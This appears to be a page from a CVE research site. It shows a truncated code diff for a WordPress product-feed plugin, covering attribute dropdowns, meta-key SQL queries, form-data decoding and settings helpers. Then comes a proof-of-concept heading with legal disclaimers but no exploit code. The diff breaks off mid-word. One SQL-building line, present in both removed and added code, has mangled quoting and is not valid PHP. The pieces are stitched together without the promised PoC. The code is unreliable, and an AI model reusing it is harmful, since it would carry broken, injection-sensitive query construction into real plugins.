+					if ( is_array( $product_global_attrs ) && ! empty( $product_global_attrs ) ) {
+						$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Product Attributes', 'webtoffee-product-feed' ) );
+						foreach ( $product_global_attrs as $key => $value ) {
+							$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
+						}
+						$attribute_dropdown .= '</optgroup>';
 					}
-					$attribute_dropdown .= '</optgroup>';
 				}
-			}
-
-			wp_cache_add( 'wt_feed_dropdown_product_attributes_v11', $attribute_dropdown, '', WEEK_IN_SECONDS );
+
+				$local_in_mapping = apply_filters('wt_pf_allow_local_attr_in_mapping', true);
+				if($local_in_mapping){
+					$product_local_attrs = self::get_local_attributes();
+					if ( is_array( $product_local_attrs ) && ! empty( $product_local_attrs ) ) {
+						$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Product Custom Attributes', 'webtoffee-product-feed' ) );
+						foreach ( $product_local_attrs as $key => $value ) {
+							$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
+						}
+						$attribute_dropdown .= '</optgroup>';
+					}
+				}
+
+				wp_cache_add( 'wt_feed_dropdown_product_attributes_v11', $attribute_dropdown, '', WEEK_IN_SECONDS );
+			}
+
+			if( $selected && strpos($selected, 'wt_static_map_vl:') !== false ){
+				$selected = 'wt-static-map-vl';
+			}
+			if ( $selected && strpos( $attribute_dropdown, 'value="' . $selected . '"' ) !== false ) {
+				$attribute_dropdown = str_replace( 'value="' . $selected . '"', 'value="' . $selected . '"' . ' selected', $attribute_dropdown );
+			}
+
+			return apply_filters( 'wt_feed_product_attributes_dropdown', $attribute_dropdown, $export_channel, $selected);
 		}

-		if( $selected && strpos($selected, 'wt_static_map_vl:') !== false ){
-			$selected = 'wt-static-map-vl';
-		}
-		if ( $selected && strpos( $attribute_dropdown, 'value="' . $selected . '"' ) !== false ) {
-			$attribute_dropdown = str_replace( 'value="' . $selected . '"', 'value="' . $selected . '"' . ' selected', $attribute_dropdown );
-		}

-		return apply_filters( 'wt_feed_product_attributes_dropdown', $attribute_dropdown, $export_channel, $selected);
-	}
-
-
-
-	/**
-	 * Get All Custom Attributes
-	 *
-	 * @return array
-	 */
-	private static function get_product_metakeys() {
-		$attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_custom_meta_v8' );
-		if ( false === $attribute_dropdown ) {
-			global $wpdb;
-			$attribute_dropdown = [];
+
+		/**
+		 * Get All Custom Attributes
+		 *
+		 * @return array
+		 */
+		private static function get_product_metakeys() {
+			$attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_custom_meta_v8' );
+			if ( false === $attribute_dropdown ) {
+				global $wpdb;
+				$attribute_dropdown = [];
+
+				$attribute_dropdown['fb_product_category'] =  __('Facebook Product Category', 'webtoffee-product-feed');
+				$attribute_dropdown['google_product_category'] = __('Google Product Category', 'webtoffee-product-feed');
+				$attribute_dropdown['brand'] = __( 'Brand', 'webtoffee-product-feed' );
+				$attribute_dropdown['gtin'] = __( 'GTIN', 'webtoffee-product-feed' );
+				$attribute_dropdown['mpn'] = __( 'MPN', 'webtoffee-product-feed' );
+				$attribute_dropdown['age_group'] = __( 'Age group', 'webtoffee-product-feed' );
+				$attribute_dropdown['gender'] = __( 'Gender', 'webtoffee-product-feed' );
+				$attribute_dropdown['color'] = __( 'Color', 'webtoffee-product-feed' );
+				$attribute_dropdown['size'] = __( 'Size', 'webtoffee-product-feed' );
+				$attribute_dropdown['material'] = __( 'Material', 'webtoffee-product-feed' );
+				$attribute_dropdown['pattern'] = __( 'Pattern', 'webtoffee-product-feed' );
+				$attribute_dropdown['unit_pricing_measure'] = __( 'Unit pricing measure', 'webtoffee-product-feed' );
+				$attribute_dropdown['unit_pricing_base_measure'] = __( 'Unit pricing base measure', 'webtoffee-product-feed' );
+				$attribute_dropdown['energy_efficiency_class'] = __( 'Energy efficiency class', 'webtoffee-product-feed' );
+				$attribute_dropdown['min_energy_efficiency_class'] = __( 'Min energy efficiencycclass', 'webtoffee-product-feed' );
+				$attribute_dropdown['max_energy_efficiency_class'] = __( 'Max energy efficiency class', 'webtoffee-product-feed' );
+				$attribute_dropdown['shipping_data'] = __('Shipping', 'webtoffee-product-feed');
+							$attribute_dropdown['quantity_to_sell_on_facebook'] = __( 'Quantity to sell on facebook', 'webtoffee-product-feed' );
+
+				$attribute_dropdown['pickup_method'] = __( 'Pickup Method', 'webtoffee-product-feed' );
+				$attribute_dropdown['pickup_sla'] = __( 'Pickup SLA', 'webtoffee-product-feed' );
+
+				$attribute_dropdown['custom_label_0'] = __( 'Custom label 0', 'webtoffee-product-feed' );
+				$attribute_dropdown['custom_label_1'] = __( 'Custom label 1', 'webtoffee-product-feed' );
+				$attribute_dropdown['custom_label_2'] = __( 'Custom label 2', 'webtoffee-product-feed' );
+				$attribute_dropdown['custom_label_3'] = __( 'Custom label 3', 'webtoffee-product-feed' );
+				$attribute_dropdown['custom_label_4'] = __( 'Custom label 4', 'webtoffee-product-feed' );
+							$attribute_dropdown['additional_variant_attribute'] = __( 'additional_variant_attribute', 'webtoffee-product-feed' );
+
+							$attribute_dropdown['link_template'] = __('Link template', 'webtoffee-product-feed' );
+							$attribute_dropdown['mobile_link_template'] = __('Mobile Link template', 'webtoffee-product-feed' );
+							$attribute_dropdown['store_code'] = __('Store code', 'webtoffee-product-feed' );
+							$attribute_dropdown['vat'] = __('VAT', 'webtoffee-product-feed' );
+
+
+
+
+				$default_exclude_keys = [
+					// WP internals.
+					'_edit_lock',
+					'_wp_old_slug',
+					'_edit_last',
+					'_wp_old_date',
+					// WC internals.
+					'_downloadable_files',
+					'_sku',
+					'_weight',
+					'_width',
+					'_height',
+					'_length',
+					'_file_path',
+					'_file_paths',
+					'_default_attributes',
+					'_product_attributes',
+					'_children',
+					'_variation_description',
+					// ignore variation description, engine will get child product description from WC CRUD WC_Product::get_description().
+					// Plugin Data.
+					'_wpcom_is_markdown',
+					// JetPack Meta.
+					'_yith_wcpb_bundle_data',
+					// Yith product bundle data.
+					'_et_builder_version',
+					// Divi builder data.
+					'_vc_post_settings',
+					// Visual Composer (WP Bakery) data.
+					'_enable_sidebar',
+					'frs_woo_product_tabs',
+				];
+
+				/**
+				 * Exclude meta keys from dropdown
+				 *
+				 * @param array $exclude              meta keys to exclude.
+				 * @param array $default_exclude_keys Exclude keys by default.
+				 */
+				$user_exclude = apply_filters( 'wt_feed_dropdown_exclude_meta_keys', null, $default_exclude_keys );
+
+				if ( is_array( $user_exclude ) && ! empty( $user_exclude ) ) {
+					$user_exclude         = esc_sql( $user_exclude );
+					$default_exclude_keys = array_merge( $default_exclude_keys, $user_exclude );
+				}
+
+				$default_exclude_keys = array_map( 'esc_sql', $default_exclude_keys );
+				$exclude_keys         = ''' . implode( '', '', $default_exclude_keys ) . ''';
+
+				$default_exclude_key_patterns = [
+					'%_et_pb_%', // Divi builder data
+					'attribute_%', // Exclude product attributes from meta list
+					'_yoast_wpseo_%', // Yoast SEO Data
+					'_acf-%', // ACF duplicate fields
+					'_aioseop_%', // All In One SEO Pack Data
+					'_oembed%', // exclude oEmbed cache meta
+					'_wpml_%', // wpml metas
+					'_oh_add_script_%', // SOGO Add Script to Individual Pages Header Footer.
+									'_wt_facebook_%', // This plugin meta
+									'_wt_google_%', // This plugin meta
+									'_wt_feed_%', // This plugin meta
+				];
+
+				/**
+				 * Exclude meta key patterns from dropdown
+				 *
+				 * @param array $exclude                      meta keys to exclude.
+				 * @param array $default_exclude_key_patterns Exclude keys by default.
+				 */
+				$user_exclude_patterns = apply_filters( 'wt_feed_dropdown_exclude_meta_keys_pattern', null, $default_exclude_key_patterns );
+				if ( is_array( $user_exclude_patterns ) && ! empty( $user_exclude_patterns ) ) {
+					$default_exclude_key_patterns = array_merge( $default_exclude_key_patterns, $user_exclude_patterns );
+				}
+				$exclude_key_patterns = '';
+				foreach ( $default_exclude_key_patterns as $pattern ) {
+					$exclude_key_patterns .= $wpdb->prepare( ' AND meta_key NOT LIKE %s', $pattern );
+				}
+
+				$sql = sprintf( /** @lang text */ "SELECT DISTINCT( meta_key ) FROM %s WHERE 1=1 AND post_id IN ( SELECT ID FROM %s WHERE post_type = 'product' OR post_type = 'product_variation' ) AND ( meta_key NOT IN ( %s ) %s )", $wpdb->postmeta, $wpdb->posts, $exclude_keys, $exclude_key_patterns );
+
+				// sql escaped, cached
+				$data = $wpdb->get_results( $sql ); // phpcs:ignore
+
+				if ( count( $data ) ) {
+					foreach ( $data as $value ) {
+						//TODO Remove ACF Fields
+						$attribute_dropdown[ 'meta:' . $value->meta_key ] = $value->meta_key;
+					}
+				}
+							$attribute_dropdown['meta:_yoast_wpseo_title'] = __('Yoast Title', 'webtoffee-product-feed'); // Yoast Title
+							$attribute_dropdown['meta:_yoast_wpseo_metadesc'] = __('Yoast Description', 'webtoffee-product-feed'); // Yoast Description
+							$attribute_dropdown['meta:_aioseo_title'] = __('All in One SEO Title', 'webtoffee-product-feed'); // All in One SEO Title
+							$attribute_dropdown['meta:_aioseo_description'] = __('All in One SEO Description', 'webtoffee-product-feed'); // All in One SEO Description
+							$attribute_dropdown['meta:rank_math_title'] = __('Rank Math SEO Title', 'webtoffee-product-feed'); // Rank Math SEO Title
+							$attribute_dropdown['meta:rank_math_description'] = __('Rank Math SEO Description', 'webtoffee-product-feed'); // Rank Math SEO Description
+
+				wp_cache_add( 'wt_feed_dropdown_product_custom_meta_v8', $attribute_dropdown, '', WEEK_IN_SECONDS );

-			$attribute_dropdown['fb_product_category'] =  __('Facebook Product Category', 'webtoffee-product-feed');
-			$attribute_dropdown['google_product_category'] = __('Google Product Category', 'webtoffee-product-feed');
-			$attribute_dropdown['brand'] = __( 'Brand', 'webtoffee-product-feed' );
-			$attribute_dropdown['gtin'] = __( 'GTIN', 'webtoffee-product-feed' );
-			$attribute_dropdown['mpn'] = __( 'MPN', 'webtoffee-product-feed' );
-			$attribute_dropdown['age_group'] = __( 'Age group', 'webtoffee-product-feed' );
-			$attribute_dropdown['gender'] = __( 'Gender', 'webtoffee-product-feed' );
-			$attribute_dropdown['color'] = __( 'Color', 'webtoffee-product-feed' );
-			$attribute_dropdown['size'] = __( 'Size', 'webtoffee-product-feed' );
-			$attribute_dropdown['material'] = __( 'Material', 'webtoffee-product-feed' );
-			$attribute_dropdown['pattern'] = __( 'Pattern', 'webtoffee-product-feed' );
-			$attribute_dropdown['unit_pricing_measure'] = __( 'Unit pricing measure', 'webtoffee-product-feed' );
-			$attribute_dropdown['unit_pricing_base_measure'] = __( 'Unit pricing base measure', 'webtoffee-product-feed' );
-			$attribute_dropdown['energy_efficiency_class'] = __( 'Energy efficiency class', 'webtoffee-product-feed' );
-			$attribute_dropdown['min_energy_efficiency_class'] = __( 'Min energy efficiencycclass', 'webtoffee-product-feed' );
-			$attribute_dropdown['max_energy_efficiency_class'] = __( 'Max energy efficiency class', 'webtoffee-product-feed' );
-			$attribute_dropdown['shipping_data'] = __('Shipping', 'webtoffee-product-feed');
-                        $attribute_dropdown['quantity_to_sell_on_facebook'] = __( 'Quantity to sell on facebook', 'webtoffee-product-feed' );
-
-			$attribute_dropdown['pickup_method'] = __( 'Pickup Method', 'webtoffee-product-feed' );
-			$attribute_dropdown['pickup_sla'] = __( 'Pickup SLA', 'webtoffee-product-feed' );
-
-			$attribute_dropdown['custom_label_0'] = __( 'Custom label 0', 'webtoffee-product-feed' );
-			$attribute_dropdown['custom_label_1'] = __( 'Custom label 1', 'webtoffee-product-feed' );
-			$attribute_dropdown['custom_label_2'] = __( 'Custom label 2', 'webtoffee-product-feed' );
-			$attribute_dropdown['custom_label_3'] = __( 'Custom label 3', 'webtoffee-product-feed' );
-			$attribute_dropdown['custom_label_4'] = __( 'Custom label 4', 'webtoffee-product-feed' );
-                        $attribute_dropdown['additional_variant_attribute'] = __( 'additional_variant_attribute', 'webtoffee-product-feed' );
-
-                        $attribute_dropdown['link_template'] = __('Link template', 'webtoffee-product-feed' );
-                        $attribute_dropdown['mobile_link_template'] = __('Mobile Link template', 'webtoffee-product-feed' );
-                        $attribute_dropdown['store_code'] = __('Store code', 'webtoffee-product-feed' );
-                        $attribute_dropdown['vat'] = __('VAT', 'webtoffee-product-feed' );
-
-
-
-
-			$default_exclude_keys = [
-				// WP internals.
-				'_edit_lock',
-				'_wp_old_slug',
-				'_edit_last',
-				'_wp_old_date',
-				// WC internals.
-				'_downloadable_files',
-				'_sku',
-				'_weight',
-				'_width',
-				'_height',
-				'_length',
-				'_file_path',
-				'_file_paths',
-				'_default_attributes',
-				'_product_attributes',
-				'_children',
-				'_variation_description',
-				// ignore variation description, engine will get child product description from WC CRUD WC_Product::get_description().
-				// Plugin Data.
-				'_wpcom_is_markdown',
-				// JetPack Meta.
-				'_yith_wcpb_bundle_data',
-				// Yith product bundle data.
-				'_et_builder_version',
-				// Divi builder data.
-				'_vc_post_settings',
-				// Visual Composer (WP Bakery) data.
-				'_enable_sidebar',
-				'frs_woo_product_tabs',
-			];
-
-			/**
-			 * Exclude meta keys from dropdown
-			 *
-			 * @param array $exclude              meta keys to exclude.
-			 * @param array $default_exclude_keys Exclude keys by default.
-			 */
-			$user_exclude = apply_filters( 'wt_feed_dropdown_exclude_meta_keys', null, $default_exclude_keys );
-
-			if ( is_array( $user_exclude ) && ! empty( $user_exclude ) ) {
-				$user_exclude         = esc_sql( $user_exclude );
-				$default_exclude_keys = array_merge( $default_exclude_keys, $user_exclude );
 			}

-			$default_exclude_keys = array_map( 'esc_sql', $default_exclude_keys );
-			$exclude_keys         = ''' . implode( '', '', $default_exclude_keys ) . ''';
-
-			$default_exclude_key_patterns = [
-				'%_et_pb_%', // Divi builder data
-				'attribute_%', // Exclude product attributes from meta list
-				'_yoast_wpseo_%', // Yoast SEO Data
-				'_acf-%', // ACF duplicate fields
-				'_aioseop_%', // All In One SEO Pack Data
-				'_oembed%', // exclude oEmbed cache meta
-				'_wpml_%', // wpml metas
-				'_oh_add_script_%', // SOGO Add Script to Individual Pages Header Footer.
-                                '_wt_facebook_%', // This plugin meta
-                                '_wt_google_%', // This plugin meta
-                                '_wt_feed_%', // This plugin meta
-			];
+			return apply_filters( 'wt_feed_product_additional_fields', $attribute_dropdown );
+		}
+

-			/**
-			 * Exclude meta key patterns from dropdown
-			 *
-			 * @param array $exclude                      meta keys to exclude.
-			 * @param array $default_exclude_key_patterns Exclude keys by default.
-			 */
-			$user_exclude_patterns = apply_filters( 'wt_feed_dropdown_exclude_meta_keys_pattern', null, $default_exclude_key_patterns );
-			if ( is_array( $user_exclude_patterns ) && ! empty( $user_exclude_patterns ) ) {
-				$default_exclude_key_patterns = array_merge( $default_exclude_key_patterns, $user_exclude_patterns );
-			}
-			$exclude_key_patterns = '';
-			foreach ( $default_exclude_key_patterns as $pattern ) {
-				$exclude_key_patterns .= $wpdb->prepare( ' AND meta_key NOT LIKE %s', $pattern );
+		public static function get_global_attributes() {
+
+			$global_attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_global_attr_v4' );
+			if ( false === $global_attribute_dropdown ) {
+				$global_attribute_dropdown = array();
+				// Load the main attributes
+				$global_attributes = wc_get_attribute_taxonomy_labels();
+				if ( count( $global_attributes ) ) {
+					foreach ( $global_attributes as $key => $value ) {
+						$global_attribute_dropdown['wt_pf_pa_' . $key ] = $value;
+					}
+				}
+				wp_cache_set( 'wt_feed_dropdown_product_global_attr_v4', $global_attribute_dropdown, '', WEEK_IN_SECONDS );
 			}
+					return apply_filters( 'wt_feed_product_global_attributes_fields', $global_attribute_dropdown );
+		}

-			$sql = sprintf( /** @lang text */ "SELECT DISTINCT( meta_key ) FROM %s WHERE 1=1 AND post_id IN ( SELECT ID FROM %s WHERE post_type = 'product' OR post_type = 'product_variation' ) AND ( meta_key NOT IN ( %s ) %s )", $wpdb->postmeta, $wpdb->posts, $exclude_keys, $exclude_key_patterns );
-
-			// sql escaped, cached
-			$data = $wpdb->get_results( $sql ); // phpcs:ignore
-
-			if ( count( $data ) ) {
-				foreach ( $data as $value ) {
-					//TODO Remove ACF Fields
-					$attribute_dropdown[ 'meta:' . $value->meta_key ] = $value->meta_key;
+		public static function get_local_attributes() {
+			$attributes = wp_cache_get( 'wt_feed_dropdown_product_local_attr_v4' );
+			if ( false === $attributes ) {
+				$attributes = self::get_variations_attributes();
+				$attributes += self::get_product_custom_attributes();
+
+				wp_cache_set( 'wt_feed_dropdown_product_local_attr_v1', $attributes, '', WEEK_IN_SECONDS );
+			}
+					return apply_filters( 'wt_feed_product_local_attributes_fields', $attributes );
+		}
+
+		public static function get_variations_attributes() {
+
+			global $wpdb;
+			$attributes = array();
+
+			$sql        = $wpdb->prepare(
+				"SELECT DISTINCT( meta_key ) FROM {$wpdb->postmeta}
+				WHERE post_id IN (
+					SELECT ID FROM {$wpdb->posts} WHERE post_type = %s
+				) AND (
+					meta_key LIKE %s
+					AND meta_key NOT LIKE %s
+				)",
+				'product_variation',
+				'attribute_%',
+				'attribute_pa_%'
+			);
+			$local_attributes = $wpdb->get_col( $sql ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.PreparedSQL.NotPrepared
+			foreach ( $local_attributes as $local_attribute ) {
+				$local_attribute  = str_replace( 'attribute_', '', $local_attribute );
+				$attributes[ 'wt_pf_cattr_' . $local_attribute ] = ucwords( str_replace( '-', ' ', $local_attribute ) );
+			}
+
+			return $attributes;
+		}
+
+
+		public static function get_product_custom_attributes() {
+			global $wpdb;
+			$attributes       = array();
+			// Note: Table names cannot be prepared with placeholders in WordPress
+			$sql              = $wpdb->prepare(
+				'SELECT meta.meta_id, meta.meta_key as name, meta.meta_value as type FROM ' . $wpdb->postmeta . ' AS meta, ' . $wpdb->posts . ' AS posts WHERE meta.post_id = posts.id AND posts.post_type LIKE %s AND meta.meta_key = %s',
+				'%product%',
+				'_product_attributes'
+			);
+			$custom_attributes = $wpdb->get_results( $sql ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.PreparedSQL.NotPrepared
+			if ( ! empty( $custom_attributes ) ) {
+				foreach ( $custom_attributes as $value ) {
+					$product_attr = maybe_unserialize( $value->type );
+					if ( is_array( $product_attr ) ) {
+						foreach ( $product_attr as $key => $arr_value ) {
+							if ( strpos( $key, 'pa_' ) === false ) {
+								$attributes[ 'wt_pf_cattr_'. $key ] = ucwords( str_replace( '-', ' ', $arr_value['name'] ) );
+							}
+						}
+					}
 				}
 			}
-                        $attribute_dropdown['meta:_yoast_wpseo_title'] = __('Yoast Title', 'webtoffee-product-feed'); // Yoast Title
-                        $attribute_dropdown['meta:_yoast_wpseo_metadesc'] = __('Yoast Description', 'webtoffee-product-feed'); // Yoast Description
-                        $attribute_dropdown['meta:_aioseo_title'] = __('All in One SEO Title', 'webtoffee-product-feed'); // All in One SEO Title
-                        $attribute_dropdown['meta:_aioseo_description'] = __('All in One SEO Description', 'webtoffee-product-feed'); // All in One SEO Description
-                        $attribute_dropdown['meta:rank_math_title'] = __('Rank Math SEO Title', 'webtoffee-product-feed'); // Rank Math SEO Title
-                        $attribute_dropdown['meta:rank_math_description'] = __('Rank Math SEO Description', 'webtoffee-product-feed'); // Rank Math SEO Description

-			wp_cache_add( 'wt_feed_dropdown_product_custom_meta_v8', $attribute_dropdown, '', WEEK_IN_SECONDS );
+			return $attributes;
+		}
+
+		public static function get_geneder_list(){
+				$gender_options = array(
+			'male'           => _x( 'Male', 'product gender', 'webtoffee-product-feed' ),
+			'female'   => _x( 'Female', 'product gender', 'webtoffee-product-feed' ),
+			'unisex'          => _x( 'Unisex', 'product gender', 'webtoffee-product-feed' ),
+		);

+		return apply_filters( 'wt_feed_product_gender_options', $gender_options );
 		}
+
+		public static function get_age_group(){
+			$age_group	 = array(
+				'all ages' => __( 'All ages', 'webtoffee-product-feed' ),
+				'adult' => __( 'Adult', 'webtoffee-product-feed' ),
+				'teen' => __( 'Teen', 'webtoffee-product-feed' ),
+				'kids' => __( 'Kids', 'webtoffee-product-feed' ),
+				'toddler' => __( 'Toddler', 'webtoffee-product-feed' ),
+				'infant' => __( 'Infant', 'webtoffee-product-feed' ),
+				'newborn' => __( 'Newborn', 'webtoffee-product-feed' )
+			);
+
+			return apply_filters( 'wt_feed_product_agegroup', $age_group );
+		}
+			public static function wt_feed_get_product_conditions() {
+					$conditions = array(
+							'new'           => _x( 'New', 'product condition', 'webtoffee-product-feed' ),
+							'refurbished'   => _x( 'Refurbished', 'product condition', 'webtoffee-product-feed' ),
+							'used'          => _x( 'Used', 'product condition', 'webtoffee-product-feed' ),
+							'used_like_new' => _x( 'Used like new', 'product condition', 'webtoffee-product-feed' ),
+							'used_good'     => _x( 'Used good', 'product condition', 'webtoffee-product-feed' ),
+							'used_fair'     => _x( 'Used fair', 'product condition', 'webtoffee-product-feed' ),
+					);
+
+					return apply_filters( 'wt_feed_facebook_product_conditions', $conditions );
+			}

-		return apply_filters( 'wt_feed_product_additional_fields', $attribute_dropdown );
-	}
-
-
-	public static function get_global_attributes() {
-
-        $global_attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_global_attr_v4' );
-		if ( false === $global_attribute_dropdown ) {
-			$global_attribute_dropdown = array();
-			// Load the main attributes
-			$global_attributes = wc_get_attribute_taxonomy_labels();
-			if ( count( $global_attributes ) ) {
-				foreach ( $global_attributes as $key => $value ) {
-					$global_attribute_dropdown['wt_pf_pa_' . $key ] = $value;
-				}
-			}
-			wp_cache_set( 'wt_feed_dropdown_product_global_attr_v4', $global_attribute_dropdown, '', WEEK_IN_SECONDS );
-		}
-                return apply_filters( 'wt_feed_product_global_attributes_fields', $global_attribute_dropdown );
-	}
-
-	public static function get_local_attributes() {
-		$attributes = wp_cache_get( 'wt_feed_dropdown_product_local_attr_v4' );
-		if ( false === $attributes ) {
-			$attributes = self::get_variations_attributes();
-			$attributes += self::get_product_custom_attributes();
+		/**
+		*   Decode the post data as normal array from json encoded from data.
+		*   If step key is specified, then it will return the data corresponds to the form key
+		*   @param array $form_data
+		*   @param string $key
+		*/
+		public static function process_formdata($form_data, $key='')
+		{
+			/**
+			 * 2.3.4 - Added to handle the json encoded data.
+			 */
+			$form_data = is_serialized($form_data) ? self::wt_unserialize_safe($form_data) : $form_data;
+			$form_data = is_string($form_data) ? json_decode($form_data, true) : $form_data;
+
+			if($key!="") /* if key is given then take its data */
+			{
+				if(isset($form_data[$key]))
+				{
+					if(is_array($form_data[$key]))
+					{
+						$form_data_vl=$form_data[$key];
+					}else
+					{
+						$form_data_vl=json_decode(stripslashes($form_data[$key]),true);
+					}
+				}else
+				{
+					$form_data_vl=array();
+				}
+			}else
+			{
+				$form_data_vl=array();
+
+				// Check if $form_data is an array before iterating
+				if(is_array($form_data))
+				{
+					foreach($form_data as $form_datak=>$form_datav)
+					{
+						$form_data_vl[$form_datak]=self::process_formdata($form_data, $form_datak);
+					}
+				}
+			}

-			wp_cache_set( 'wt_feed_dropdown_product_local_attr_v1', $attributes, '', WEEK_IN_SECONDS );
+			return (is_array($form_data_vl) ? $form_data_vl : array());
 		}
-                return apply_filters( 'wt_feed_product_local_attributes_fields', $attributes );
-	}

-	public static function get_variations_attributes() {
+		/**
+		*   Form field generator
+		*/
+		public static function field_generator($form_fields, $form_data)
+		{
+			include plugin_dir_path( dirname( __FILE__ ) ).'admin/partials/_form_field_generator.php';
+		}

-		global $wpdb;
-		$attributes = array();

-		$sql        = $wpdb->prepare(
-			"SELECT DISTINCT( meta_key ) FROM {$wpdb->postmeta}
-			WHERE post_id IN (
-			    SELECT ID FROM {$wpdb->posts} WHERE post_type = %s
-			) AND (
-			    meta_key LIKE %s
-			    AND meta_key NOT LIKE %s
-			)",
-			'product_variation',
-			'attribute_%',
-			'attribute_pa_%'
-		);
-		$local_attributes = $wpdb->get_col( $sql ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.PreparedSQL.NotPrepared
-		foreach ( $local_attributes as $local_attribute ) {
-			$local_attribute  = str_replace( 'attribute_', '', $local_attribute );
-			$attributes[ 'wt_pf_cattr_' . $local_attribute ] = ucwords( str_replace( '-', ' ', $local_attribute ) );
+		/**
+		*   Save advanced settings
+		*   @param  array   $settings   array of setting values
+		*/
+		public static function set_advanced_settings($settings)
+		{
+			update_option('wt_pf_advanced_settings', $settings);
 		}

-		return $attributes;
-	}
+		/**
+		*
+		*   Extract validation rule from form field array
+		*   @param  array   $fields   form field array
+		*/
+		public static function extract_validation_rules($fields)
+		{
+			$out=array_map(function ($r) { return (isset($r['validation_rule']) ? $r['validation_rule'] : ''); }, $fields);
+			return array_filter($out);
+		}

+		/**
+		*   Get advanced settings.
+		*   @param      string  $key    key for specific setting (optional)
+		*   @return     mixed   if key provided then the value of key otherwise array of values
+		*/
+		public static function get_advanced_settings($key="")
+		{
+			$advanced_settings=get_option('wt_pf_advanced_settings');
+			$advanced_settings=($advanced_settings ? $advanced_settings : array());
+			if($key!="")
+			{
+				$key=(substr($key,0,8)!=='wt_pf_' ? 'wt_pf_' : '').$key;
+				if(isset($advanced_settings[$key]))
+				{
+					return $advanced_settings[$key];
+				}else
+				{
+					$default_settings=self::get_advanced_settings_default();
+					return (isset($default_settings[$key]) ? $default_settings[$key] : '');
+				}
+			}else
+			{
+				$default_settings=self::get_advanced_settings_default();
+				$advanced_settings=wp_parse_args($advanced_settings, $default_settings);
+				return $advanced_settings;
+			}
+		}

-	public static function get_product_custom_attributes() {
-		global $wpdb;
-		$attributes       = array();
-		// Note: Table names cannot be prepared with placeholders in WordPress
-		$sql              = $wpdb->prepare(
-			'SELECT meta.meta_id, meta.meta_key as name, meta.meta_value as type FROM ' . $wpdb->postmeta . ' AS meta, ' . $wpdb->posts . ' AS posts WHERE meta.post_id = posts.id AND posts.post_type LIKE %s AND meta.meta_key = %s',
-			'%product%',
-			'_product_attributes'
-		);
-		$custom_attributes = $wpdb->get_results( $sql ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery,WordPress.DB.DirectDatabaseQuery.NoCaching,WordPress.DB.PreparedSQL.NotPrepared
-		if ( ! empty( $custom_attributes ) ) {
-			foreach ( $custom_attributes as $value ) {
-				$product_attr = maybe_unserialize( $value->type );
-				if ( is_array( $product_attr ) ) {
-					foreach ( $product_attr as $key => $arr_value ) {
-						if ( strpos( $key, 'pa_' ) === false ) {
-							$attributes[ 'wt_pf_cattr_'. $key ] = ucwords( str_replace( '-', ' ', $arr_value['name'] ) );
-						}
-					}
+		/**
+		*   Get default value of advanced settings
+		*   @return     array   array of default values
+		*
+		*/
+		public static function get_advanced_settings_default()
+		{
+			$fields=self::get_advanced_settings_fields();
+			foreach ($fields as $key => $value)
+			{
+				if(isset($value['value']))
+				{
+					$key=(substr($key,0,8)!=='wt_pf_' ? 'wt_pf_' : '').$key;
+					$out[$key]=$value['value'];
 				}
 			}
+			return $out;
 		}

-		return $attributes;
-	}
-
-	public static function get_geneder_list(){
-			$gender_options = array(
-		'male'           => _x( 'Male', 'product gender', 'webtoffee-product-feed' ),
-		'female'   => _x( 'Female', 'product gender', 'webtoffee-product-feed' ),
-		'unisex'          => _x( 'Unisex', 'product gender', 'webtoffee-product-feed' ),
-	);
+		/**
+		*   Get advanced fields
+		*   @return     array   array of fields
+		*
+		*/
+		public static function get_advanced_settings_fields()
+		{
+			$fields=array();
+			return apply_filters('wt_pf_advanced_setting_fields_basic', $fields);
+		}
+
+		public static function wt_allowed_screens(){
+			$screens=array('webtoffee_product_feed_main_export', 'webtoffee_product_feed_main_history', 'webtoffee_product_feed', 'webtoffee-product-feed');
+			return apply_filters('wt_pf_allowed_screens_basic', $screens);

-	return apply_filters( 'wt_feed_product_gender_options', $gender_options );
-	}
-
-	public static function get_age_group(){
-		$age_group	 = array(
-			'all ages' => __( 'All ages', 'webtoffee-product-feed' ),
-			'adult' => __( 'Adult', 'webtoffee-product-feed' ),
-			'teen' => __( 'Teen', 'webtoffee-product-feed' ),
-			'kids' => __( 'Kids', 'webtoffee-product-feed' ),
-			'toddler' => __( 'Toddler', 'webtoffee-product-feed' ),
-			'infant' => __( 'Infant', 'webtoffee-product-feed' ),
-			'newborn' => __( 'Newborn', 'webtoffee-product-feed' )
-		);
+		}
+		public static function wt_get_current_page(){
+			return (isset($_GET['page'])) ? sanitize_text_field(wp_unslash($_GET['page'])) : ''; //phpcs:ignore WordPress.Security.NonceVerification.Recommended
+		}
+
+		public static f

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
